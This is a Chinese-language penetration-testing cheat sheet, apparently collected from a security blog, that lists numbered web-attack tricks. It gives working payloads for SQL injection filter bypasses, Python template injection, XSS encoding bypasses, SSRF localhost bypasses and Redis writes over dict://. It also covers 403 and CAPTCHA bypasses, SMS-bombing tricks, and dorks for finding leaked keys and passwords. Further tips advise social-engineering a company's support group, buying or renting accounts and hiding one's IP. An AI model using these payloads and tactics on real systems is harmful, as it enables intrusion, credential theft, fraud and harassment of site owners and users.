1、如果提示缺少參數(shù)，如{msg：params error}，可嘗使用字典模糊測試構(gòu)造參數(shù)，進(jìn)一步攻擊。

2、程序溢出，int最大值為2147483647，可嘗試使用該值進(jìn)行整數(shù)溢出，觀察現(xiàn)象。

3、403，404響應(yīng)不灰心，嘗試使用dirsearch等工具探測目錄。

4、驗證碼簡單繞過：重復(fù)使用，萬能驗證碼（0000,8888），空驗證碼，驗證碼可識別（可用PKAV HTTP Fuzzer工具識別等）

5、短信轟炸繞過：手機(jī)號前加+86有可能會繞過，手機(jī)號輸入郵箱，郵箱處輸入手機(jī)號

6、如果驗證碼有實效，可嘗試一段時間內(nèi)重復(fù)發(fā)送獲取驗證碼，因為有實效，所以有可能會延長驗證碼的時長。

7、SQL注入時，如果數(shù)據(jù)庫是Mysql，可以嘗試使用&&替換and，如：' && '1'='1，' %26%26 '1'='1。

8、SQL注入時，如果數(shù)據(jù)庫是Mysql，waf過濾了=，可嘗試用like替代。如：and 1 like 1

9、JWT格式在http://jwt.calebb.net/可以解密，前提是要知道秘鑰，可以嘗試構(gòu)造任意數(shù)據(jù)，看他會不會有報錯信息中攜帶秘鑰信息，可以通過https://github.com/firebase/php-jwt生成JWT。JWT格式header.payload.signature

10、如果開放了redis服務(wù)（1234端口），可以嘗試使用/actuator/redis/info語句看是否能讀取敏感信息，如：http://www.xxx.com:1234/actuator/redis/info

11、Gitlab平臺漏洞 - CVE-2020-10977

12、API接口處，可以自己構(gòu)造參數(shù)，POST形式傳參，可以嘗試構(gòu)造為JSON格式，記得添加content-type: application/json，一些可嘗試參數(shù)，page，size，id。

13、手機(jī)發(fā)送短信時間限制的話，可以在手機(jī)號前嘗試使用特殊字符，或空格。他的邏輯應(yīng)該是這樣的，用戶輸入手機(jī)號——>后端判斷該手機(jī)號是否在30秒或者60秒內(nèi)請求過——>如果沒有，判斷發(fā)送過來的手機(jī)號是夠是11位的純數(shù)字，如果不是，去掉非數(shù)字字符——>和數(shù)據(jù)庫中的手機(jī)號比對，是夠存在于數(shù)據(jù)庫中，如果存在那么向該手機(jī)發(fā)送驗證碼。

14、圖片驗證碼可設(shè)置為空，如：code=undefined

15、自動以驗證碼內(nèi)容，觀察Cookie中，參數(shù)中是否有發(fā)送給用戶的內(nèi)容，可以嘗試更改，可以構(gòu)造釣魚鏈接。

16、模板注入，在{{xxx}}中輸入的命令參數(shù)可被執(zhí)行，如：

www.baidu.com/{{1+1}}

以Python為例，列出當(dāng)前目錄下所有文件的Payload：{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

17、信息收集，在搜狗搜索中選擇微信可以搜索相關(guān)企業(yè)相關(guān)公眾號資產(chǎn)。18、在JS文件中搜索關(guān)鍵字API，Swagger UI等等，嘗試尋找API接口地址。19、swagger接口常見路徑：

/swagger/

/api/swagger/

/swagger/ui/

/api/swagger/ui/

/swagger-ui.html/

/api/swagger-ui.html/

/user/swagger-ui.html/

/swagger/ui/

/api/swagger/ui/

/libs/swaggerui/

/api/swaggerui/

/swagger-resources/configuration/ui/

/swagger-resources/configuration/security/

20、swagger組件特征固定title：Swagger UI21、盲測目錄是否存在，如果存在該目錄可能會自動在URL末尾添加/補全。22、Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a023、獲取賬號：文庫，QQ群，github泄露，借/租/買賬號。24、如果泄露阿里云的 AKSK，可以使用AKSKtools工具進(jìn)一步利用。https://xz.aliyun.com/t/842925、如果遇見后臺頁面一閃而過，接著讓你登錄，一般使用了權(quán)限認(rèn)證方式，可以用一下方式進(jìn)行繞過，或者遇見401,403,302，都可以嘗試使用以下方法：

一、GET /xxx HTTP/1.1 à403

Host: test.com

繞過：

GET /xxx HTTP/1.1 à200

Host: test.com

X-Original-URL: /xxx

二、GET /xxx HTTP/1.1 à403

Host: test.com

繞過：

GET /xxx HTTP/1.1 à200

Host: test.com

Referer: http://test.com/xxx

三、302跳轉(zhuǎn)：攔截并drop跳轉(zhuǎn)的數(shù)據(jù)包，使其停留在當(dāng)前頁面。

四、前端驗證：只需要刪掉對應(yīng)的遮擋模塊，或者是驗證模塊的前端代碼。

26、一款生成gopher協(xié)議payload的工具：

https://github.com/firebroo/sec_tools

27、Dict協(xié)議寫入流程：

1.寫入內(nèi)容；

dict://127.0.0.1:6379/set?test

2.設(shè)置保存路徑；

dict://127.0.0.1:6379/config:set:dir:/tmp/

3.設(shè)置保存文件名；

dict://127.0.0.1:6379/config:set:dbfilename:1.png

4.保存。

dict://127.0.0.1:6379/save

28、CentOS 7系統(tǒng)利用suid提權(quán)獲取Root Shell

https://www.freebuf.com/articles/system/244627.html

29、xss中標(biāo)簽利用的payload：

<a href=javascript:alert(1)>xx</a>

30、XSS過濾了單引號，等號可以：

①、使用：String.fromCharCode(97,108,101,114,116,40,49,41);

為alert(1)，該方法輸出的結(jié)果為字符串，可以使用eval()進(jìn)行執(zhí)行，即彈框操作

eval(String.fromCharCode(97,108,101,114,116,40,49,41));

②、atob函數(shù)：

eval(atob`YWxlcnQoMSk=`) 為 eval(atob`alert(1)`) 其中`為反引號

31、XSS過濾了單引號，等號以及圓括號，eval：

①、過濾了eval函數(shù)可以用其他函數(shù)去繞過，如：Function，constructor

Function`a${atob`YWxlcnQoMSk=`}```

``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```

32、可使用下面命令查看是否處在docker虛擬機(jī)中

cat /proc/1/cgroup

33、萬能密碼試試'=0#34、CORS漏洞驗證，可以使用curl來驗證：

curl https://www.xxxx.com -H "Origin: https://test.com" -I

檢查返回包的 Access-Control-Allow-Origin 字段是否為https://test.com

35、在盲測目標(biāo)系統(tǒng)是否為Shiro時，可以在Cookie中手動構(gòu)造rememebrMe=xxx，如果返回包中Set-Cookie中存在rememberMe=deleteMe，則證明該系統(tǒng)使用了Shiro，因此可以進(jìn)一步攻擊。36、使用正則獲取網(wǎng)站中所包含的其他URL：

cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

37、常見的一些遠(yuǎn)程命令執(zhí)行（RCE）參數(shù)，詳情，請看dicts目錄下的RCE-extentions.txt文件。38、繞過SSRF防護(hù)的幾個小方法：

A、繞過SSRF限制通過CIDR，如：

http://127.127.127.127

http://127.0.0.0

B、不完整的地址，如：

http://127.1

http://0

C、將地址結(jié)合在通過特殊字符結(jié)合在一起，如：

http://1.1.1.1 &@2.2.2.2# @3.3.3.3/

urllib : 3.3.3.3

D、繞過解析器，如：

http://127.1.1.1:80\@127.2.2.2:80/

E、繞過localhost通過[::]，如：

http://[::]:80/

http://0000::1:80/

39、幾個常用的Google語法：

inurl:example.com intitle:"index of"

inurl:example.com intitle:"index of /" "*key.pem"

inurl:example.com ext:log

inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv

inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

40、通過favicon的hash來對比相關(guān)聯(lián)的兩個網(wǎng)站：

腳本地址：https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py

命令：python3 favihash.py -f https://target/favicon.ico -t targets.txt -s

41、一些本地包含參數(shù)，詳情請看dicts目錄下的LFI-extentions.txt文件。42、在JavaScript文件中可以找一些隱藏的GET參數(shù)，比如：

首先，在js文件中找到一些變量，比如：var test="xss"

然后，可以嘗試使用GET方法構(gòu)造每一個參數(shù)，比如：

https://example.com/?test=”xsstest

本方法可能會發(fā)現(xiàn)一些XSS

43、使用github dorks幫助我們尋找一些敏感信息，比如：

extension:pem private

extension:ppk private

extension:sql mysql dump password

extension:json api.forecast.io

extension:json mongolab.com

extension:yaml mongolab.com

extension:ica [WFClient] Password=

extension:avastlic “support.avast.com”

extension:js jsforce conn.login

extension:json googleusercontent client_secret

“target.com” send_keys

“target.com” password

“target.com” api_key

“target.com” apikey

“target.com” jira_password

“target.com” root_password

“target.com” access_token

“target.com” config

“target.com” client_secret

“target.com” user auth

通過上述語法，可以搜索到一些敏感的私鑰，一些SSH登錄私鑰，mysql的數(shù)據(jù)庫密碼，API key等等。

另外推薦一個腳本：https://github.com/techgaun/github-dorks

44、SSRF常見的參數(shù)，詳情請看dicts目錄下的SSRF-extensions.txt文件。45、通過添加.json后綴，泄露一些敏感信息，比如：

一次正常請求：

GET /ResetPassword HTTP/1.1

{"email":"victim@example.com"}

響應(yīng)：

HTTP/1.1 200 OK

添加.json后綴的請求：

GET /ResetPassword.json HTTP/1.1

{"email":"victim@example.com"}

響應(yīng)：

HTTP/1.1 200 OK

{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}

原鏈接：https://twitter.com/SalahHasoneh1/status/1293918353971531776

46、如果響應(yīng)為401，可以試試在請求頭中添加X-Custom-IP-Authorization: 127.0.0.1

注意

---------------------------更新分界線-------------------------

1、至于登陸后臺的網(wǎng)站，如果有重置密碼功能，但被禁用了，可以找該公司技術(shù)qq群，假裝用戶忘記密碼，提重置密碼需求，讓開通功能，可以驗證下是否有任意密碼重置漏洞。

2、如果遇見后臺頁面一閃而過，接著讓你登錄，一般使用了權(quán)限認(rèn)證方式:

三、302跳轉(zhuǎn)：攔截并drop跳轉(zhuǎn)的數(shù)據(jù)包，使其停留在當(dāng)前頁面。這個操作每次試都是不成功的，但是可以修改返回的302為200，然后刪除掉Location字段。3、任意文件下載：/porc/self/cmdline --當(dāng)前進(jìn)程的cmdline參數(shù)，/var/lib/mlocate/mlocate.db --全文件路徑。4、容易發(fā)生短信轟炸的幾個業(yè)務(wù)場景以及繞過方法：

①：登錄處 ②：注冊處 ③：找回密碼處 ④：綁定處 ⑤：活動領(lǐng)取處 ⑥：獨特功能處 ⑦：反饋處

一般繞過限制方法：

手機(jī)號碼前后加空格，86，086，0086，+86，0，00，/r,/n, 以及特殊符號等

修改cookie，變量，返回

138888888889? 12位經(jīng)過短信網(wǎng)關(guān)取前11位，導(dǎo)致短信轟炸

5、注入的時候可以試試--%0a union --%0a select 嘗試?yán)@過。6、注入的時候，多看order by,group by,{$var}。7、手機(jī)號前加若干+會造成短信轟炸。8、如果在旁站中發(fā)現(xiàn)短信驗證碼在response中出現(xiàn)，可以試試主站或者其他站點中驗證碼是否通用。9、獲取短信驗證碼時，用逗號隔開兩個手機(jī)號，有可能兩個手機(jī)號能獲取到同一個驗證碼。

注意

---------------------更新分界線---------------------

1、測試注入and ord(0x1)->true，and ord(0x0)->false。2、遇到文件讀取漏洞，除了讀取配置文件，還可以嘗試讀取網(wǎng)站文件，來進(jìn)行代碼審計，說不定就有開發(fā)疏忽的漏洞在源代碼里。3、使用python快速開啟http服務(wù)器：

基于python2.x，命令如下：

python -m SimpleHTTPServer 8000

# 在當(dāng)前目錄起個 8000 端口的 HTTP 服務(wù)

基于python3.x，命令如下：

python -m http.server 8000

4、滲透時盡量不要暴露自己的 IP 地址，掛代理是必須的。Author By：ffffffff0x●linux 下要查看自己終端是否走代理可以 curlhttps://ifconfig.me/看下返回的 IP 地址●windows 就直接訪問https://ifconfig.me/即可5、整理字典時，推薦用linux下的工具快速合并和去重。Author By：ffffffff0x

cat file1.txt file2.txt fileN.txt > out.txt

sort out.txt | uniq > out2.txt